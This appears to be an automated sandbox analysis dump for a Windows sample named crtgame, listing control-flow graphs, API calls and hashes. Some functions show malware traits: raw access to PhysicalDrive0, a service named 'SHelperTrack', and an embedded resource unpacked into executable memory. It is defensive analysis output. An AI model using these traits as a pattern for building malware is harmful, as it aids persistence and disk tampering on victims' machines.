                                                                                    control_flow_graph 89 401a58-401a80 CreateFileA 90 401a86-401a9a 89->90 91 401b4e-401b53 89->91 92 401aa1-401ac9 DeviceIoControl 90->92 93 401acb-401ad3 92->93 94 401afc-401b04 92->94 97 401ad5-401adb 93->97 98 401add-401ae2 93->98 95 401b06-401b0c call 402d16 94->95 96 401b0d-401b10 94->96 95->96 100 401b12-401b15 96->100 101 401b43-401b4d CloseHandle 96->101 97->94 98->94 102 401ae4-401afa call 402d30 call 4018cc 98->102 104 401b30-401b3d call 402d08 100->104 105 401b17-401b20 GetLastError 100->105 101->91 102->94 104->92 104->101 105->101 107 401b22-401b25 105->107 107->104 111 401b27-401b2d 107->111 111->104
                                                                                    APIs
                                                                                    • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
                                                                                    • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
                                                                                    • GetLastError.KERNEL32 ref: 00401B17
                                                                                    • CloseHandle.KERNELBASE(?), ref: 00401B46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                    • String ID: \\.\PhysicalDrive0
                                                                                    • API String ID: 4026078076-1180397377
                                                                                    • Opcode ID: 1cfa54963423ccb6de0497cca80913006299f85b3fc9f197ef1958e0eec48844
                                                                                    • Instruction ID: 868ec34f3df53846a82942ba312037215340139e482717fb2ff40e0043273f54
                                                                                    • Opcode Fuzzy Hash: 1cfa54963423ccb6de0497cca80913006299f85b3fc9f197ef1958e0eec48844
                                                                                    • Instruction Fuzzy Hash: DE315C71D00118EADB21AF95DD849EFBBB9EF80750F20817AE514B22A0E7785E45CF98

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetVersion.KERNEL32 ref: 00403028
                                                                                      • Part of subcall function 004037EE: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403061,00000000), ref: 004037FF
                                                                                      • Part of subcall function 004037EE: HeapDestroy.KERNEL32 ref: 0040383E
                                                                                    • GetCommandLineA.KERNEL32 ref: 00403076
                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 004030A1
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004030C4
                                                                                      • Part of subcall function 0040311D: ExitProcess.KERNEL32 ref: 0040313A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                    • String ID:
                                                                                    • API String ID: 2057626494-0
                                                                                    • Opcode ID: 74d03af8937ab966108a033b29af4d68479ef1804e35821151968a48ed606fbd
                                                                                    • Instruction ID: 2fe00f1ba1adaf8205d5c113529bd3f59b30330f25e837ab47a4da163d052dde
                                                                                    • Opcode Fuzzy Hash: 74d03af8937ab966108a033b29af4d68479ef1804e35821151968a48ed606fbd
                                                                                    • Instruction Fuzzy Hash: 97217CF0940614EADB14EFA6DE85A6E7BA9EF45714F10023EF501BB2D1DB7C4900CA98

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 142 401c5b-401c7c GetWindowsDirectoryA 143 401cb7-401cbc 142->143 144 401c7e-401ca0 CreateFileA 142->144 144->143 145 401ca2-401cb1 GetFileTime CloseHandle 144->145 145->143
                                                                                    APIs
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
                                                                                    • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
                                                                                    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401CB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateDirectoryHandleTimeWindows
                                                                                    • String ID:
                                                                                    • API String ID: 87451460-0
                                                                                    • Opcode ID: 93c530355d9a491392339dfd9c54abbb5d3981132c02f10e563fc8c5a833d3f6
                                                                                    • Instruction ID: ce0d93df2b96caaa30ac4b808da5b0a14f13b17a645efb0ba923654cecfefb73
                                                                                    • Opcode Fuzzy Hash: 93c530355d9a491392339dfd9c54abbb5d3981132c02f10e563fc8c5a833d3f6
                                                                                    • Instruction Fuzzy Hash: 32F0E27660021077E62057359E8DFCB3A6C8BC6B60F010139BFC9F21D0DAB48549C6B4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 146 40470f-404719 147 40471b-404726 GetCurrentProcess TerminateProcess 146->147 148 40472c-404742 146->148 147->148 149 404780-404794 call 4047a8 148->149 150 404744-40474b 148->150 161 4047a6-4047a7 149->161 162 404796-4047a0 ExitProcess 149->162 151 40474d-404759 150->151 152 40476f-40477f call 4047a8 150->152 154 40475b-40475f 151->154 155 40476e 151->155 152->149 158 404761 154->158 159 404763-40476c 154->159 155->152 158->159 159->154 159->155
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,004046FA,?,00000000,00000000,004030D9,00000000,00000000), ref: 0040471F
                                                                                    • TerminateProcess.KERNEL32(00000000,?,004046FA,?,00000000,00000000,004030D9,00000000,00000000), ref: 00404726
                                                                                    • ExitProcess.KERNEL32 ref: 004047A0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: ddcd27b6cf442a4cf1ad30eb50297e1ec77499e0fa85d3c8b09b97d5a0756837
                                                                                    • Instruction ID: 14ec98fc88cf18415eef0b27452b8b63013d8e7584821c4302456c35a525c8ab
                                                                                    • Opcode Fuzzy Hash: ddcd27b6cf442a4cf1ad30eb50297e1ec77499e0fa85d3c8b09b97d5a0756837
                                                                                    • Instruction Fuzzy Hash: 1C01D6B5140311EEDA20AF24FEC4A1A7BA9EBD1750B11013FFA80B31E1C7786984C66D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 163 4037ee-40380c HeapCreate 164 403844-403846 163->164 165 40380e-40381b call 4036a6 163->165 168 40382a-40382d 165->168 169 40381d-403828 call 40384b 165->169 171 403847-40384a 168->171 172 40382f call 40409c 168->172 175 403834-403836 169->175 172->175 175->171 176 403838-40383e HeapDestroy 175->176 176->164
                                                                                    APIs
                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,00403061,00000000), ref: 004037FF
                                                                                      • Part of subcall function 004036A6: GetVersionExA.KERNEL32 ref: 004036C5
                                                                                    • HeapDestroy.KERNEL32 ref: 0040383E
                                                                                      • Part of subcall function 0040384B: HeapAlloc.KERNEL32(00000000,00000140,00403827,000003F8), ref: 00403858
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocCreateDestroyVersion
                                                                                    • String ID:
                                                                                    • API String ID: 2507506473-0
                                                                                    • Opcode ID: 218b6dc03d2ab9838becf9bac36a4874602e6cf4ce8e7c23e6badea129053baa
                                                                                    • Instruction ID: 94dbf082b7a3c1bc0364f6fd3295f8753e005faaa9027e695ed7ca1b1aaa4fc2
                                                                                    • Opcode Fuzzy Hash: 218b6dc03d2ab9838becf9bac36a4874602e6cf4ce8e7c23e6badea129053baa
                                                                                    • Instruction Fuzzy Hash: 42F0E53260420199EB20BF316E427263DC8AB84B83F10887BF541F85E1EB7887818909

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • RegisterServiceCtrlHandlerA.ADVAPI32(SHelperTrack,Function_000023D1), ref: 00402434
                                                                                    • SetServiceStatus.ADVAPI32(0040C398), ref: 00402493
                                                                                    • GetLastError.KERNEL32 ref: 00402495
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A2
                                                                                    • GetLastError.KERNEL32 ref: 004024C3
                                                                                    • SetServiceStatus.ADVAPI32(0040C398), ref: 004024F3
                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000234F,00000000,00000000,00000000), ref: 004024FF
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402508
                                                                                    • CloseHandle.KERNEL32 ref: 00402514
                                                                                    • SetServiceStatus.ADVAPI32(0040C398), ref: 0040253D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                    • String ID: SHelperTrack
                                                                                    • API String ID: 3346042915-857109786
                                                                                    • Opcode ID: 4fc3d0daeda22bca5ef77fad7c59bb9e09566fd46082fe623e30784e4ccbe48d
                                                                                    • Instruction ID: 1fd61b723b603eea0553bdbdabdd14e5a5d5d25f9658a13dc72339bd9551936d
                                                                                    • Opcode Fuzzy Hash: 4fc3d0daeda22bca5ef77fad7c59bb9e09566fd46082fe623e30784e4ccbe48d
                                                                                    • Instruction Fuzzy Hash: DF21B4B0821204EFD2109F16FF89917BEA8EB96754B11923FE905B62B1CBB90454CF6D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 363 40661a-406625 364 406627-406636 LoadLibraryA 363->364 365 406669-406670 363->365 368 406638-40664d GetProcAddress 364->368 369 40669f-4066a1 364->369 366 406672-406678 365->366 367 406688-406694 365->367 366->367 373 40667a-406681 366->373 370 40669b-40669e 367->370 368->369 371 40664f-406664 GetProcAddress * 2 368->371 369->370 371->365 373->367 374 406683-406686 373->374 374->367
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004052B1,?,Microsoft Visual C++ Runtime Library,00012010,?,0040857C,?,004085CC,?,?,?,Runtime Error!Program: ), ref: 0040662C
                                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406644
                                                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00406655
                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406662
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                    • API String ID: 2238633743-4044615076
                                                                                    • Opcode ID: 89fd29c83fe0656f9344de68875189ac262eb9b27d5f8afccbb55a3c33680799
                                                                                    • Instruction ID: 9d2b8c9d35e922798993d531f446e6b2e7a25ca1052a85fc7f6406c465d5e1cc
                                                                                    • Opcode Fuzzy Hash: 89fd29c83fe0656f9344de68875189ac262eb9b27d5f8afccbb55a3c33680799
                                                                                    • Instruction Fuzzy Hash: 98012171601301EFC7209FB59EC0D2B3AE89B98B803161D3EF545F32A1DA7A9811DB6C

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 376 4068f7-406925 377 406927-406941 LCMapStringW 376->377 378 40696d-406970 376->378 379 406943-406949 377->379 380 40694b-40695d LCMapStringA 377->380 381 406982-40698a 378->381 382 406972-40697f call 406b1b 378->382 379->378 383 406963 380->383 384 406a85 380->384 386 4069a9-4069ac 381->386 387 40698c-4069a4 LCMapStringA 381->387 382->381 383->378 388 406a87-406a98 384->388 386->384 389 4069b2-4069b5 386->389 387->388 391 4069b7-4069bc 389->391 392 4069bf-4069e3 MultiByteToWideChar 389->392 391->392 392->384 393 4069e9-406a1d call 402db0 392->393 393->384 397 406a1f-406a36 MultiByteToWideChar 393->397 397->384 398 406a38-406a51 LCMapStringW 397->398 398->384 399 406a53-406a57 398->399 400 406a99-406acf call 402db0 399->400 401 406a59-406a5c 399->401 400->384 408 406ad1-406ae7 LCMapStringW 400->408 403 406a62-406a65 401->403 404 406b14-406b16 401->404 403->384 406 406a67-406a7f LCMapStringW 403->406 404->388 406->384 406->404 408->384 409 406ae9-406aee 408->409 410 406af0-406af2 409->410 411 406af4-406af7 409->411 412 406afa-406b0e WideCharToMultiByte 410->412 411->412 412->384 412->404
                                                                                    APIs
                                                                                    • LCMapStringW.KERNEL32(00000000,00000100,00408648,00000001,00000000,00000000,00000103,00000001,00000000,?,00405F95,00200020,00000000,?,00000000,00000000), ref: 00406939
                                                                                    • LCMapStringA.KERNEL32(00000000,00000100,00408644,00000001,00000000,00000000,?,00405F95,00200020,00000000,?,00000000,00000000,00000001), ref: 00406955
                                                                                    • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00405F95,?,00000103,00000001,00000000,?,00405F95,00200020,00000000,?,00000000,00000000), ref: 0040699E
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00405F95,00200020,00000000,?,00000000,00000000), ref: 004069D6
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405F95,00200020,00000000,?,00000000), ref: 00406A2E
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405F95,00200020,00000000,?,00000000), ref: 00406A44
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00405F95,00000000,00405F95,?,?,00405F95,00200020,00000000,?,00000000), ref: 00406A77
                                                                                    • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405F95,00200020,00000000,?,00000000), ref: 00406ADF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 352835431-0
                                                                                    • Opcode ID: 4deab49c664ae0a21811bd24cb8222142d3b12e2d815f637103256df17c70743
                                                                                    • Instruction ID: 59052ec96fa6e9b6a1b06c9b0af0f1045741597cf286c582b0c53739a6d86081
                                                                                    • Opcode Fuzzy Hash: 4deab49c664ae0a21811bd24cb8222142d3b12e2d815f637103256df17c70743
                                                                                    • Instruction Fuzzy Hash: 5B518E71A00209EFCF219F94CE45E9F7BB5FB49750F11412AF916B12A0C73A8921DFA9

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 413 40518d-40519b 414 4051a0-4051a2 413->414 415 4051a4-4051ad 414->415 416 4051af-4051bb 414->416 415->414 415->416 417 4051c1-4051c9 416->417 418 4052dd-4052df 416->418 419 4052b7-4052d7 call 402d30 GetStdHandle WriteFile 417->419 420 4051cf-4051d1 417->420 419->418 421 4051e0-4051e6 420->421 422 4051d3-4051da 420->422 421->418 424 4051ec-405202 GetModuleFileNameA 421->424 422->419 422->421 426 405204-405216 call 402e60 424->426 427 405217-40522f call 402d30 424->427 426->427 432 405231-405257 call 402d30 call 4066b0 427->432 433 40525a-4052b5 call 402e60 call 402e70 * 3 call 40661a 427->433 432->433 433->418
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 004051FA
                                                                                    • GetStdHandle.KERNEL32(000000F4,0040857C,00000000,?,00000000,00000000), ref: 004052D0
                                                                                    • WriteFile.KERNEL32(00000000), ref: 004052D7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                    • API String ID: 3784150691-4022980321
                                                                                    • Opcode ID: 87f33cabc0c00aa0fec26d50226044fc56a9d7efbac7f10a8d9899958e493da2
                                                                                    • Instruction ID: 22c9936ad7e37c61766cc13472e3efefc26ac9c2eba3d4c5ea0e4eac7f932d77
                                                                                    • Opcode Fuzzy Hash: 87f33cabc0c00aa0fec26d50226044fc56a9d7efbac7f10a8d9899958e493da2
                                                                                    • Instruction Fuzzy Hash: 4831D472A402186EDF20A660CE49F9B736CEF85304F1404BFF445F61C1EABC9A848E5D
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403086), ref: 00404CBF
                                                                                    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403086), ref: 00404CD3
                                                                                    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403086), ref: 00404CFF
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403086), ref: 00404D37
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403086), ref: 00404D59
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403086), ref: 00404D72
                                                                                    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403086), ref: 00404D85
                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00404DC3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1823725401-0
                                                                                    • Opcode ID: d9234cf3cbcc751796c88370d915bd9edf31e3da9d5f2c50eb19383ce1c8816a
                                                                                    • Instruction ID: 0a577491b400eb6cbb59326f85be9cf7e6af23b6261f68aea654aba62c190591
                                                                                    • Opcode Fuzzy Hash: d9234cf3cbcc751796c88370d915bd9edf31e3da9d5f2c50eb19383ce1c8816a
                                                                                    • Instruction Fuzzy Hash: C3318EF25142266FD7203BB45D8483B769DEEC9358716063FEB82F32C1EA394C4552AD
                                                                                    APIs
                                                                                    • FindResourceA.KERNEL32(?,0000000A,00000000), ref: 00402011
                                                                                    • GetLastError.KERNEL32 ref: 0040201D
                                                                                    • SizeofResource.KERNEL32(00000000), ref: 0040202A
                                                                                    • LoadResource.KERNEL32(00000000), ref: 00402044
                                                                                    • LockResource.KERNEL32(00000000), ref: 0040204B
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402056
                                                                                    • GetTickCount.KERNEL32 ref: 00402092
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004020F8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                    • String ID:
                                                                                    • API String ID: 564119183-0
                                                                                    • Opcode ID: 090f4e76fc33472d0f60b8a6e5b7169ee354eea33370b3ef473bc2f44cf863c8
                                                                                    • Instruction ID: 872a1ff13b40b7df4e57b26522b35ed74ba0e7314c9dbe1ae4f604b1d6e81ef5
                                                                                    • Opcode Fuzzy Hash: 090f4e76fc33472d0f60b8a6e5b7169ee354eea33370b3ef473bc2f44cf863c8
                                                                                    • Instruction Fuzzy Hash: 85312C71A00245ABDB115BB99F98AAF7F68EB49344B10803AFA81F72C1CA748945C768
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,759230D0), ref: 004021E3
                                                                                    • GetLastError.KERNEL32 ref: 00402298
                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 004022A5
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 004022E0
                                                                                    • Sleep.KERNEL32(000003E8), ref: 00402336
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
                                                                                    • String ID: (
                                                                                    • API String ID: 2871813557-3887548279
                                                                                    • Opcode ID: 9321c93d6946193766cc869a403ef6b29bf9c598059eb8e21111d4d635bceff1
                                                                                    • Instruction ID: 73eca0390210d7a40a1dffd36c51e55bbb3bf329b7d36a6fe3b71f36df8b4b42
                                                                                    • Opcode Fuzzy Hash: 9321c93d6946193766cc869a403ef6b29bf9c598059eb8e21111d4d635bceff1
                                                                                    • Instruction Fuzzy Hash: C5516375A00205EFDB14CF94CA84BAEB7B5FF44304F2481AEE905AB3C1D7B49A45CB94
                                                                                    APIs
                                                                                    • GetStringTypeW.KERNEL32(00000001,00408648,00000001,00000000,00000103,00000001,00000000,00405F95,00200020,00000000,?,00000000,00000000,00000001), ref: 004067ED
                                                                                    • GetStringTypeA.KERNEL32(00000000,00000001,00408644,00000001,?,?,00000000,00000000,00000001), ref: 00406807
                                                                                    • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405F95,00200020,00000000,?,00000000,00000000,00000001), ref: 0040683B
                                                                                    • MultiByteToWideChar.KERNEL32(00405F95,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405F95,00200020,00000000,?,00000000,00000000,00000001), ref: 00406873
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004068C9
                                                                                    • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004068DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: StringType$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 3852931651-0
                                                                                    • Opcode ID: 343b14822d5ec7d111824b73352daee55c6e4e1e1d6c52bea77643b708a495d7
                                                                                    • Instruction ID: 50980d25d2700a0f5f5aeda790786f3a94e16ebae640f38457f1ad5474eb6a05
                                                                                    • Opcode Fuzzy Hash: 343b14822d5ec7d111824b73352daee55c6e4e1e1d6c52bea77643b708a495d7
                                                                                    • Instruction Fuzzy Hash: 62419172501205EFCF20AF94CD85EAF3B78FB04310F11453AF912B2290C7398920DBA9
                                                                                    APIs
                                                                                    • GetVersionExA.KERNEL32 ref: 004036C5
                                                                                    • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004036FA
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040375A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                    • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                    • API String ID: 1385375860-4131005785
                                                                                    • Opcode ID: 2b88326c2fe55b0a14a7feb83319d9effda22d0a54183ba7eb2025853be321d7
                                                                                    • Instruction ID: a2ac6458048a5ea589aa0576a35918abbfe1c7cf89248b80a846e37b277fff56
                                                                                    • Opcode Fuzzy Hash: 2b88326c2fe55b0a14a7feb83319d9effda22d0a54183ba7eb2025853be321d7
                                                                                    • Instruction Fuzzy Hash: F53104F194528469EB318A705C55BDE3FAC9B0630AF2484FBD185F72C2D63D8F898B19
                                                                                    APIs
                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 00404E2F
                                                                                    • GetFileType.KERNEL32(00000800), ref: 00404ED5
                                                                                    • GetStdHandle.KERNEL32(-000000F6), ref: 00404F2E
                                                                                    • GetFileType.KERNEL32(00000000), ref: 00404F3C
                                                                                    • SetHandleCount.KERNEL32 ref: 00404F73
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleType$CountInfoStartup
                                                                                    • String ID:
                                                                                    • API String ID: 1710529072-0
                                                                                    • Opcode ID: 2c403891a32edcd1acd392618127e857cbe5837ab8f556158ace0b12abf30bb6
                                                                                    • Instruction ID: a78e8e59f5f07694c43e079bee3d99c5a60abb541b89316fbbdfd4e78c5fe92d
                                                                                    • Opcode Fuzzy Hash: 2c403891a32edcd1acd392618127e857cbe5837ab8f556158ace0b12abf30bb6
                                                                                    • Instruction Fuzzy Hash: D55123B1504202CBD7209B28CE847673BD0FB91364F19873EE6A6EB3E0D7789845979D
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,00402DE9), ref: 004031FF
                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040320F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
